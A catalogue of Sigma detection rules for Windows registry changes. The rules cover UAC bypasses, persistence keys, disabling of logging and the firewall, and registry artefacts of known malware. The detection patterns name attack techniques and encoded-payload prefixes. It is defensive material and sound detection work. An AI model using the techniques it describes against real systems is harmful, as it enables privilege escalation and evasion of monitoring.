Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\Volume are captured.
Detection logic
condition: selection and not filter
filter:
TargetObject|contains: System\CurrentControlSet\Services\VSS\Start
selection:
Image|endswith: esentutl.exe
TargetObject|contains: System\CurrentControlSet\Services\VSS
UAC Bypass Via Wsreset
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.
Detection logic
condition: selection
selection:
TargetObject|endswith: \AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command
Narrator’s Feedback-Hub Persistence
- source: sigma
- technicques:
- t1547
- t1547.001
Description
Detects abusing Windows 10 Narrator’s Feedback-Hub
Detection logic
condition: 1 of selection*
selection1:
EventType: DeleteValue
TargetObject|endswith: \AppXypsaf9f1qserqevf0sws76dx4k9a5206\Shell\open\command\DelegateExecute
selection2:
TargetObject|endswith: \AppXypsaf9f1qserqevf0sws76dx4k9a5206\Shell\open\command\(Default)
Windows Credential Editor Registry
- source: sigma
- technicques:
- t1003
- t1003.001
Description
Detects the use of Windows Credential Editor (WCE)
Detection logic
condition: selection
selection:
TargetObject|contains: Services\WCESERVICE\Start
Disable Security Events Logging Adding Reg Key MiniNt
- source: sigma
- technicques:
- t1112
- t1562
- t1562.001
Description
Detects the addition of a key ‘MiniNt’ to the registry. Upon a reboot, Windows Event Log service will stopped write events.
Detection logic
condition: selection
selection:
- EventType: CreateKey
TargetObject: HKLM\SYSTEM\CurrentControlSet\Control\MiniNt
- NewName: HKLM\SYSTEM\CurrentControlSet\Control\MiniNt
WINEKEY Registry Modification
- source: sigma
- technicques:
- t1547
Description
Detects potential malicious modification of run keys by winekey or team9 backdoor
Detection logic
condition: selection
selection:
TargetObject|endswith: Software\Microsoft\Windows\CurrentVersion\Run\Backup Mgr
Registry Persistence Mechanisms in Recycle Bin
- source: sigma
- technicques:
- t1547
Description
Detects persistence registry keys for Recycle Bin
Detection logic
condition: 1 of selection_*
selection_create:
EventType: RenameKey
NewName|contains: \CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open
selection_set:
EventType: SetValue
TargetObject|contains: \CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command\(Default)
Registry Entries For Azorult Malware
- source: sigma
- technicques:
- t1112
Description
Detects the presence of a registry key created during Azorult execution
Detection logic
condition: selection
selection:
EventID:
- 12
- 13
TargetObject|contains: SYSTEM\
TargetObject|endswith: \services\localNETService
New DLL Added to AppInit_DLLs Registry Key
- source: sigma
- technicques:
- t1546
- t1546.010
Description
DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll
Detection logic
condition: selection and not filter
filter:
Details: (Empty)
selection:
- TargetObject|endswith:
- \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls
- \SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls
- NewName|endswith:
- \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls
- \SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_Dlls
NetNTLM Downgrade Attack - Registry
- source: sigma
- technicques:
- t1112
- t1562
- t1562.001
Description
Detects NetNTLM downgrade attack
Detection logic
condition: selection
selection:
TargetObject|contains|all:
- SYSTEM\
- ControlSet
- \Control\Lsa
TargetObject|endswith:
- \lmcompatibilitylevel
- \NtlmMinClientSec
- \RestrictSendingNTLMTraffic
New DLL Added to AppCertDlls Registry Key
- source: sigma
- technicques:
- t1546
- t1546.009
Description
Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.
Detection logic
condition: selection
selection:
- TargetObject: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls
- NewName: HKLM\SYSTEM\CurentControlSet\Control\Session Manager\AppCertDlls
Creation of a Local Hidden User Account by Registry
- source: sigma
- technicques:
- t1136
- t1136.001
Description
Sysmon registry detection of a local hidden user account.
Detection logic
condition: selection
selection:
Image|endswith: \lsass.exe
TargetObject|contains: \SAM\SAM\Domains\Account\Users\Names\
TargetObject|endswith: $
Pandemic Registry Key
- source: sigma
- technicques:
- t1105
Description
Detects Pandemic Windows Implant
Detection logic
condition: selection
selection:
TargetObject|contains: \SYSTEM\CurrentControlSet\services\null\Instance
Potential Qakbot Registry Activity
- source: sigma
- technicques:
- t1112
Description
Detects a registry key used by IceID in a campaign that distributes malicious OneNote files
Detection logic
condition: selection
selection:
TargetObject|endswith: \Software\firm\soft\Name
OceanLotus Registry Activity
- source: sigma
- technicques:
- t1112
Description
Detects registry keys created in OceanLotus (also known as APT32) attacks
Detection logic
condition: selection_clsid or selection_hkcu or all of selection_appx_*
selection_appx_1:
TargetObject|contains: \SOFTWARE\App\
selection_appx_2:
TargetObject|contains:
- AppXbf13d4ea2945444d8b13e2121cb6b663\
- AppX70162486c7554f7f80f481985d67586d\
- AppX37cc7fdccd644b4f85f4b22d5a3f105a\
TargetObject|endswith:
- Application
- DefaultIcon
selection_clsid:
TargetObject|contains: \SOFTWARE\Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model
selection_hkcu:
TargetObject|contains:
- Classes\AppXc52346ec40fb4061ad96be0e6cb7d16a\
- Classes\AppX3bbba44c6cae4d9695755183472171e2\
- Classes\CLSID\{E3517E26-8E93-458D-A6DF-8030BC80528B}\
- Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model
DLL Load via LSASS
- source: sigma
- technicques:
- t1547
- t1547.008
Description
Detects a method to load DLL via LSASS process using an undocumented Registry key
Detection logic
condition: selection and not 1 of filter_*
filter_domain_controller:
Details:
- '%%systemroot%%\system32\ntdsa.dll'
- '%%systemroot%%\system32\lsadb.dll'
Image: C:\Windows\system32\lsass.exe
selection:
TargetObject|contains:
- \CurrentControlSet\Services\NTDS\DirectoryServiceExtPt
- \CurrentControlSet\Services\NTDS\LsaDbExtPt
Removal Of SD Value to Hide Schedule Task - Registry
- source: sigma
- technicques:
- t1562
Description
Remove SD (Security Descriptor) value in \Schedule\TaskCache\Tree registry hive to hide schedule task. This technique is used by Tarrask malware
Detection logic
condition: selection
selection:
EventType: DeleteKey
TargetObject|contains|all:
- \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\
- SD
Terminal Server Client Connection History Cleared - Registry
- source: sigma
- technicques:
- t1070
- t1112
Description
Detects the deletion of registry keys containing the MSTSC connection history
Detection logic
condition: 1 of selection*
selection1:
EventType: DeleteValue
TargetObject|contains: \Microsoft\Terminal Server Client\Default\MRU
selection2:
EventType: DeleteKey
TargetObject|contains: \Microsoft\Terminal Server Client\Servers\
Removal Of Index Value to Hide Schedule Task - Registry
- source: sigma
- technicques:
- t1562
Description
Detects when the “index” value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as “schtasks /query”
Detection logic
condition: selection
selection:
EventType: DeleteKey
TargetObject|contains|all:
- \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\
- Index
Blue Mockingbird - Registry
- source: sigma
- technicques:
- t1047
- t1112
Description
Attempts to detect system changes made by Blue Mockingbird
Detection logic
condition: selection
selection:
TargetObject|endswith: \CurrentControlSet\Services\wercplsupport\Parameters\ServiceDll
ETW Logging Disabled For rpcrt4.dll
- source: sigma
- technicques:
- t1112
- t1562
Description
Detects changes to the “ExtErrorInformation” key in order to disable ETW logging for rpcrt4.dll
Detection logic
condition: selection
selection:
Details:
- DWORD (0x00000000)
- DWORD (0x00000002)
TargetObject|endswith: \Microsoft\Windows NT\Rpc\ExtErrorInformation
UAC Notification Disabled
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the “UACDisableNotify” value. UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system’s operation or change settings that affect other users. When “UACDisableNotify” is set to 1, UAC prompts are suppressed.
Detection logic
condition: selection
selection:
Details: DWORD (0x00000001)
TargetObject|contains: \Microsoft\Security Center\UACDisableNotify
PowerShell Logging Disabled Via Registry Key Tampering
- source: sigma
- technicques:
- t1564
- t1564.001
Description
Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging
Detection logic
condition: selection
selection:
Details: DWORD (0x00000000)
TargetObject|contains:
- \Microsoft\Windows\PowerShell\
- \Microsoft\PowerShellCore\
TargetObject|endswith:
- \ModuleLogging\EnableModuleLogging
- \ScriptBlockLogging\EnableScriptBlockLogging
- \ScriptBlockLogging\EnableScriptBlockInvocationLogging
- \Transcription\EnableTranscripting
- \Transcription\EnableInvocationHeader
- \EnableScripts
Potential Persistence Via CHM Helper DLL
- source: sigma
- technicques:
Description
Detects when an attacker modifies the registry key “HtmlHelp Author” to achieve persistence
Detection logic
condition: selection
selection:
TargetObject|contains:
- \Software\Microsoft\HtmlHelp Author\Location
- \Software\WOW6432Node\Microsoft\HtmlHelp Author\Location
Potential Ransomware Activity Using LegalNotice Message
- source: sigma
- technicques:
- t1491
- t1491.001
Description
Detect changes to the “LegalNoticeCaption” or “LegalNoticeText” registry values where the message set contains keywords often used in ransomware ransom messages
Detection logic
condition: selection
selection:
Details|contains:
- encrypted
- Unlock-Password
- paying
TargetObject|contains:
- \SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeCaption
- \SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeText
Default RDP Port Changed to Non Standard Port
- source: sigma
- technicques:
- t1547
- t1547.010
Description
Detects changes to the default RDP port. Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_port:
Details: DWORD (0x00000d3d)
selection:
TargetObject|endswith: \Control\Terminal Server\WinStations\RDP-Tcp\PortNumber
UAC Secure Desktop Prompt Disabled
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the “PromptOnSecureDesktop” value. The “PromptOnSecureDesktop” setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that’s isolated from other processes running on the system. It’s designed to prevent malicious software from intercepting or tampering with UAC prompts. When “PromptOnSecureDesktop” is set to 0, UAC prompts are displayed on the user’s current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.
Detection logic
condition: selection
selection:
Details: DWORD (0x00000000)
TargetObject|contains: \Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop
Enable Microsoft Dynamic Data Exchange
- source: sigma
- technicques:
- t1559
- t1559.002
Description
Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.
Detection logic
condition: 1 of selection_*
selection_excel:
Details: DWORD (0x00000000)
TargetObject|endswith:
- \Excel\Security\DisableDDEServerLaunch
- \Excel\Security\DisableDDEServerLookup
selection_word:
Details:
- DWORD (0x00000001)
- DWORD (0x00000002)
TargetObject|endswith: \Word\Security\AllowDDE
Disable Windows Firewall by Registry
- source: sigma
- technicques:
- t1562
- t1562.004
Description
Detect set EnableFirewall to 0 to disable the Windows firewall
Detection logic
condition: selection
selection:
Details: DWORD (0x00000000)
TargetObject|endswith:
- \SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile\EnableFirewall
- \SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile\EnableFirewall
ETW Logging Disabled For SCM
- source: sigma
- technicques:
- t1112
- t1562
Description
Detects changes to the “TracingDisabled” key in order to disable ETW logging for services.exe (SCM)
Detection logic
condition: selection
selection:
Details: DWORD (0x00000001)
TargetObject|endswith: Software\Microsoft\Windows NT\CurrentVersion\Tracing\SCM\Regular\TracingDisabled
Modify User Shell Folders Startup Value
- source: sigma
- technicques:
- t1547
- t1547.001
Description
Detect modification of the startup key to a path where a payload could be stored to be launched during startup
Detection logic
condition: selection
selection:
TargetObject|contains: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell
Folders
TargetObject|endswith: Startup
Disable Macro Runtime Scan Scope
- source: sigma
- technicques:
Description
Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros
Detection logic
condition: selection
selection:
Details: DWORD (0x00000000)
TargetObject|contains|all:
- \SOFTWARE\
- \Microsoft\Office\
- \Common\Security
TargetObject|endswith: \MacroRuntimeScanScope
Potential WerFault ReflectDebugger Registry Value Abuse
- source: sigma
- technicques:
- t1036
- t1036.003
Description
Detects potential WerFault “ReflectDebugger” registry value abuse for persistence.
Detection logic
condition: selection
selection:
EventType: SetValue
TargetObject|endswith: \Microsoft\Windows\Windows Error Reporting\Hangs\ReflectDebugger
Registry Persistence via Explorer Run Key
- source: sigma
- technicques:
- t1547
- t1547.001
Description
Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder
Detection logic
condition: selection
selection:
Details|contains:
- :\$Recycle.bin\
- :\ProgramData\
- :\Temp\
- :\Users\Default\
- :\Users\Public\
- :\Windows\Temp\
- \AppData\Local\Temp\
TargetObject|endswith: \Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Potential Persistence Using DebugPath
- source: sigma
- technicques:
- t1546
- t1546.015
Description
Detects potential persistence using Appx DebugPath
Detection logic
condition: 1 of selection_*
selection_debug:
TargetObject|contains: Classes\ActivatableClasses\Package\Microsoft.
TargetObject|endswith: \DebugPath
selection_default:
TargetObject|contains: \Software\Microsoft\Windows\CurrentVersion\PackagedAppXDebug\Microsoft.
TargetObject|endswith: \(Default)
Add Port Monitor Persistence in Registry
- source: sigma
- technicques:
- t1547
- t1547.010
Description
Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.
Detection logic
condition: selection and not 1 of filter_optional_*
filter_optional_cutepdf:
Details: cpwmon64_v40.dll
Image: C:\Windows\System32\spoolsv.exe
TargetObject|contains: \Control\Print\Monitors\CutePDF Writer Monitor v4.0\Driver
User|contains:
- AUTHORI
- AUTORI
filter_optional_monvnc:
TargetObject|contains: \Control\Print\Monitors\MONVNC\Driver
filter_optional_vnc:
TargetObject|contains|all:
- Control\Print\Environments\
- \Drivers\
- \VNC Printer
selection:
Details|endswith: .dll
TargetObject|contains: \Control\Print\Monitors\
Potential SentinelOne Shell Context Menu Scan Command Tampering
- source: sigma
- technicques:
Description
Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_sentinelone_binary:
Image|endswith:
- C:\Program Files\SentinelOne\
- C:\Program Files (x86)\SentinelOne\
filter_main_sentinelone_default_scan_binary:
Details|contains: \SentinelScanFromContextMenu.exe
Details|startswith:
- C:\Program Files\SentinelOne\Sentinel Agent
- C:\Program Files (x86)\SentinelOne\Sentinel Agent
selection:
TargetObject|contains: \shell\SentinelOneScan\command\
New Netsh Helper DLL Registered From A Suspicious Location
- source: sigma
- technicques:
- t1546
- t1546.007
Description
Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
Detection logic
condition: selection_target and 1 of selection_folders_*
selection_folders_1:
Details|contains:
- :\Perflogs\
- :\Users\Public\
- :\Windows\Temp\
- \AppData\Local\Temp\
- \Temporary Internet
selection_folders_2:
- Details|contains|all:
- :\Users\
- \Favorites\
- Details|contains|all:
- :\Users\
- \Favourites\
- Details|contains|all:
- :\Users\
- \Contacts\
- Details|contains|all:
- :\Users\
- \Pictures\
selection_target:
TargetObject|contains: \SOFTWARE\Microsoft\NetSh
Persistence Via Disk Cleanup Handler - Autorun
- source: sigma
- technicques:
Description
Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun. The disk cleanup manager is part of the operating system. It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager’s UI. Although Windows comes with a number of disk cleanup handlers, they aren’t designed to handle files produced by other applications. Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.
Detection logic
condition: root and 1 of selection_*
root:
TargetObject|contains: \SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\
selection_autorun:
Details: DWORD (0x00000001)
TargetObject|contains: \Autorun
selection_pre_after:
Details|contains:
- cmd
- powershell
- rundll32
- mshta
- cscript
- wscript
- wsl
- \Users\Public\
- \Windows\TEMP\
- \Microsoft\Windows\Start Menu\Programs\Startup\
TargetObject|contains:
- \CleanupString
- \PreCleanupString
Potential Persistence Via Excel Add-in - Registry
- source: sigma
- technicques:
- t1137
- t1137.006
Description
Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.
Detection logic
condition: selection
selection:
Details|endswith: .xll
Details|startswith: '/R '
TargetObject|contains: Software\Microsoft\Office\
TargetObject|endswith: \Excel\Options
Running Chrome VPN Extensions via the Registry 2 VPN Extension
- source: sigma
- technicques:
- t1133
Description
Running Chrome VPN Extensions via the Registry install 2 vpn extension
Detection logic
chrome_ext:
TargetObject|contains: Software\Wow6432Node\Google\Chrome\Extensions
TargetObject|endswith: update_url
chrome_vpn:
TargetObject|contains:
- fdcgdnkidjaadafnichfpabhfomcebme
- fcfhplploccackoneaefokcmbjfbkenj
- bihmplhobchoageeokmgbdihknkjbknd
- gkojfkhlekighikafcpjkiklfbnlmeio
- jajilbjjinjmgcibalaakngmkilboobh
- gjknjjomckknofjidppipffbpoekiipm
- nabbmpekekjknlbkgpodfndbodhijjem
- kpiecbcckbofpmkkkdibbllpinceiihk
- nlbejmccbhkncgokjcmghpfloaajcffj
- omghfjlpggmjjaagoclmmobgdodcjboh
- bibjcjfmgapbfoljiojpipaooddpkpai
- mpcaainmfjjigeicjnlkdfajbioopjko
- jljopmgdobloagejpohpldgkiellmfnc
- lochiccbgeohimldjooaakjllnafhaid
- nhnfcgpcbfclhfafjlooihdfghaeinfc
- ookhnhpkphagefgdiemllfajmkdkcaim
- namfblliamklmeodpcelkokjbffgmeoo
- nbcojefnccbanplpoffopkoepjmhgdgh
- majdfhpaihoncoakbjgbdhglocklcgno
- lnfdmdhmfbimhhpaeocncdlhiodoblbd
- eppiocemhmnlbhjplcgkofciiegomcon
- cocfojppfigjeefejbpfmedgjbpchcng
- foiopecknacmiihiocgdjgbjokkpkohc
- hhdobjgopfphlmjbmnpglhfcgppchgje
- jgbaghohigdbgbolncodkdlpenhcmcge
- inligpkjkhbpifecbdjhmdpcfhnlelja
- higioemojdadgdbhbbbkfbebbdlfjbip
- hipncndjamdcmphkgngojegjblibadbe
- iolonopooapdagdemdoaihahlfkncfgg
- nhfjkakglbnnpkpldhjmpmmfefifedcj
- jpgljfpmoofbmlieejglhonfofmahini
- fgddmllnllkalaagkghckoinaemmogpe
- ejkaocphofnobjdedneohbbiilggdlbi
- keodbianoliadkoelloecbhllnpiocoi
- hoapmlpnmpaehilehggglehfdlnoegck
- poeojclicodamonabcabmapamjkkmnnk
- dfkdflfgjdajbhocmfjolpjbebdkcjog
- kcdahmgmaagjhocpipbodaokikjkampi
- klnkiajpmpkkkgpgbogmcgfjhdoljacg
- lneaocagcijjdpkcabeanfpdbmapcjjg
- pgfpignfckbloagkfnamnolkeaecfgfh
- jplnlifepflhkbkgonidnobkakhmpnmh
- jliodmnojccaloajphkingdnpljdhdok
- hnmpcagpplmpfojmgmnngilcnanddlhb
- ffbkglfijbcbgblgflchnbphjdllaogb
- kcndmbbelllkmioekdagahekgimemejo
- jdgilggpfmjpbodmhndmhojklgfdlhob
- bihhflimonbpcfagfadcnbbdngpopnjb
- ppajinakbfocjfnijggfndbdmjggcmde
- oofgbpoabipfcfjapgnbbjjaenockbdp
- bhnhkdgoefpmekcgnccpnhjfdgicfebm
- knmmpciebaoojcpjjoeonlcjacjopcpf
- dhadilbmmjiooceioladdphemaliiobo
- jedieiamjmoflcknjdjhpieklepfglin
- mhngpdlhojliikfknhfaglpnddniijfh
- omdakjcmkglenbhjadbccaookpfjihpa
- npgimkapccfidfkfoklhpkgmhgfejhbj
- akeehkgglkmpapdnanoochpfmeghfdln
- gbmdmipapolaohpinhblmcnpmmlgfgje
- aigmfoeogfnljhnofglledbhhfegannp
- cgojmfochfikphincbhokimmmjenhhgk
- ficajfeojakddincjafebjmfiefcmanc
- ifnaibldjfdmaipaddffmgcmekjhiloa
- jbnmpdkcfkochpanomnkhnafobppmccn
- apcfdffemoinopelidncddjbhkiblecc
- mjolnodfokkkaichkcjipfgblbfgojpa
- oifjbnnafapeiknapihcmpeodaeblbkn
- plpmggfglncceinmilojdkiijhmajkjh
- mjnbclmflcpookeapghfhapeffmpodij
- bblcccknbdbplgmdjnnikffefhdlobhp
- aojlhgbkmkahabcmcpifbolnoichfeep
- lcmammnjlbmlbcaniggmlejfjpjagiia
- knajdeaocbpmfghhmijicidfcmdgbdpm
- bdlcnpceagnkjnjlbbbcepohejbheilk
- edknjdjielmpdlnllkdmaghlbpnmjmgb
- eidnihaadmmancegllknfbliaijfmkgo
- ckiahbcmlmkpfiijecbpflfahoimklke
- macdlemfnignjhclfcfichcdhiomgjjb
- chioafkonnhbpajpengbalkececleldf
- amnoibeflfphhplmckdbiajkjaoomgnj
- llbhddikeonkpbhpncnhialfbpnilcnc
- pcienlhnoficegnepejpfiklggkioccm
- iocnglnmfkgfedpcemdflhkchokkfeii
- igahhbkcppaollcjeaaoapkijbnphfhb
- njpmifchgidinihmijhcfpbdmglecdlb
- ggackgngljinccllcmbgnpgpllcjepgc
- kchocjcihdgkoplngjemhpplmmloanja
- bnijmipndnicefcdbhgcjoognndbgkep
- lklekjodgannjcccdlbicoamibgbdnmi
- dbdbnchagbkhknegmhgikkleoogjcfge
- egblhcjfjmbjajhjhpmnlekffgaemgfh
- ehbhfpfdkmhcpaehaooegfdflljcnfec
- bkkgdjpomdnfemhhkalfkogckjdkcjkg
- almalgbpmcfpdaopimbdchdliminoign
- akkbkhnikoeojlhiiomohpdnkhbkhieh
- gbfgfbopcfokdpkdigfmoeaajfmpkbnh
- bniikohfmajhdcffljgfeiklcbgffppl
- lejgfmmlngaigdmmikblappdafcmkndb
- ffhhkmlgedgcliajaedapkdfigdobcif
- gcknhkkoolaabfmlnjonogaaifnjlfnp
- pooljnboifbodgifngpppfklhifechoe
- fjoaledfpmneenckfbpdfhkmimnjocfa
- aakchaleigkohafkfjfjbblobjifikek
- dpplabbmogkhghncfbfdeeokoefdjegm
- padekgcemlokbadohgkifijomclgjgif
- bfidboloedlamgdmenmlbipfnccokknp
condition: all of chrome_*
Hiding User Account Via SpecialAccounts Registry Key
- source: sigma
- technicques:
- t1564
- t1564.002
Description
Detects modifications to the registry key “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist” where the value is set to “0” in order to hide user account from being listed on the logon screen.
Detection logic
condition: selection
selection:
Details: DWORD (0x00000000)
EventType: SetValue
TargetObject|contains: \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
UAC Bypass Abusing Winsat Path Parsing - Registry
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
Detection logic
condition: selection
selection:
Details|endswith: \appdata\local\temp\system32\winsat.exe
Details|startswith: c:\users\
TargetObject|contains: \Root\InventoryApplicationFile\winsat.exe|
TargetObject|endswith: \LowerCaseLongPath
Potential Persistence Via Outlook Today Pages
- source: sigma
- technicques:
- t1112
Description
Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key “UserDefinedUrl”.
Detection logic
condition: selection_main and 1 of selection_value_* and not 1 of filter_*
filter_office:
Image|endswith: \OfficeClickToRun.exe
Image|startswith:
- C:\Program Files\Common Files\Microsoft Shared\ClickToRun\
- C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\
selection_main:
TargetObject|contains|all:
- Software\Microsoft\Office\
- \Outlook\Today\
selection_value_stamp:
Details: DWORD (0x00000001)
TargetObject|endswith: Stamp
selection_value_user_defined:
TargetObject|endswith: UserDefinedUrl
Potential Signing Bypass Via Windows Developer Features - Registry
- source: sigma
- technicques:
Description
Detects when the enablement of developer features such as “Developer Mode” or “Application Sideloading”. Which allows the user to install untrusted packages.
Detection logic
condition: selection
selection:
Details: DWORD (0x00000001)
TargetObject|contains:
- \Microsoft\Windows\CurrentVersion\AppModelUnlock
- \Policies\Microsoft\Windows\Appx\
TargetObject|endswith:
- \AllowAllTrustedApps
- \AllowDevelopmentWithoutDevLicense
Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG
- source: sigma
- technicques:
- t1218
Description
Detects potential abuse of the provisioning registry key for indirect command execution through “Provlaunch.exe”.
Detection logic
condition: selection
selection:
TargetObject|contains: \SOFTWARE\Microsoft\Provisioning\Commands\
Bypass UAC Using SilentCleanup Task
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects the setting of the environement variable “windir” to a non default value. Attackers often abuse this variable in order to trigger a UAC bypass via the “SilentCleanup” task. The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_default:
Details: '%SystemRoot%'
selection:
TargetObject|endswith: \Environment\windir
Suspicious Environment Variable Has Been Registered
- source: sigma
- technicques:
Description
Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings
Detection logic
condition: all of selection_*
selection_details:
- Details:
- powershell
- pwsh
- Details|contains:
- \AppData\Local\Temp\
- C:\Users\Public\
- TVqQAAMAAAAEAAAA
- TVpQAAIAAAAEAA8A
- TVqAAAEAAAAEABAA
- TVoAAAAAAAAAAAAA
- TVpTAQEAAAAEAAAA
- SW52b2tlL
- ludm9rZS
- JbnZva2Ut
- SQBuAHYAbwBrAGUALQ
- kAbgB2AG8AawBlAC0A
- JAG4AdgBvAGsAZQAtA
- Details|startswith:
- SUVY
- SQBFAF
- SQBuAH
- cwBhA
- aWV4
- aQBlA
- R2V0
- dmFy
- dgBhA
- dXNpbm
- H4sIA
- Y21k
- cABhAH
- Qzpc
- Yzpc
selection_main:
TargetObject|contains: \Environment\
DHCP Callout DLL Installation
- source: sigma
- technicques:
- t1112
- t1574
- t1574.002
Description
Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)
Detection logic
condition: selection
selection:
TargetObject|endswith:
- \Services\DHCPServer\Parameters\CalloutDlls
- \Services\DHCPServer\Parameters\CalloutEnabled
Add DisallowRun Execution to Registry
- source: sigma
- technicques:
- t1112
Description
Detect set DisallowRun to 1 to prevent user running specific computer program
Detection logic
condition: selection
selection:
Details: DWORD (0x00000001)
TargetObject|endswith: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun
VBScript Payload Stored in Registry
- source: sigma
- technicques:
- t1547
- t1547.001
Description
Detects VBScript content stored into registry keys as seen being used by UNC2452 group
Detection logic
condition: selection and not 1 of filter*
filter:
TargetObject|contains: Software\Microsoft\Windows\CurrentVersion\Run
filter_dotnet:
Details|contains:
- \Microsoft.NET\Primary Interop Assemblies\Microsoft.mshtml.dll
- <\Microsoft.mshtml,fileVersion=
- _mshtml_dll_
- <\Microsoft.mshtml,culture=
Image|endswith: \msiexec.exe
TargetObject|contains: \SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\
selection:
Details|contains:
- 'vbscript:'
- 'jscript:'
- mshtml,
- RunHTMLApplication
- Execute(
- CreateObject
- window.close
TargetObject|contains: Software\Microsoft\Windows\CurrentVersion
New TimeProviders Registered With Uncommon DLL Name
- source: sigma
- technicques:
- t1547
- t1547.003
Description
Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_w32time:
Details:
- '%SystemRoot%\System32\vmictimeprovider.dll'
- '%systemroot%\system32\w32time.dll'
- C:\Windows\SYSTEM32\w32time.DLL
selection:
TargetObject|contains: \Services\W32Time\TimeProviders
TargetObject|endswith: \DllName
Change the Fax Dll
- source: sigma
- technicques:
- t1112
Description
Detect possible persistence using Fax DLL load when service restart
Detection logic
condition: selection and not filter
filter:
Details: '%systemroot%\system32\fxst30.dll'
selection:
TargetObject|contains|all:
- \Software\Microsoft\Fax\Device Providers\
- \ImageName
ETW Logging Disabled In .NET Processes - Sysmon Registry
- source: sigma
- technicques:
- t1112
- t1562
Description
Potential adversaries stopping ETW providers recording loaded .NET assemblies.
Detection logic
condition: 1 of selection_*
selection_complus:
Details:
- 0
- DWORD (0x00000000)
TargetObject|endswith:
- \COMPlus_ETWEnabled
- \COMPlus_ETWFlags
selection_etw_enabled:
Details: DWORD (0x00000000)
TargetObject|endswith: SOFTWARE\Microsoft\.NETFramework\ETWEnabled
Custom File Open Handler Executes PowerShell
- source: sigma
- technicques:
- t1202
Description
Detects the abuse of custom file open handler, executing powershell
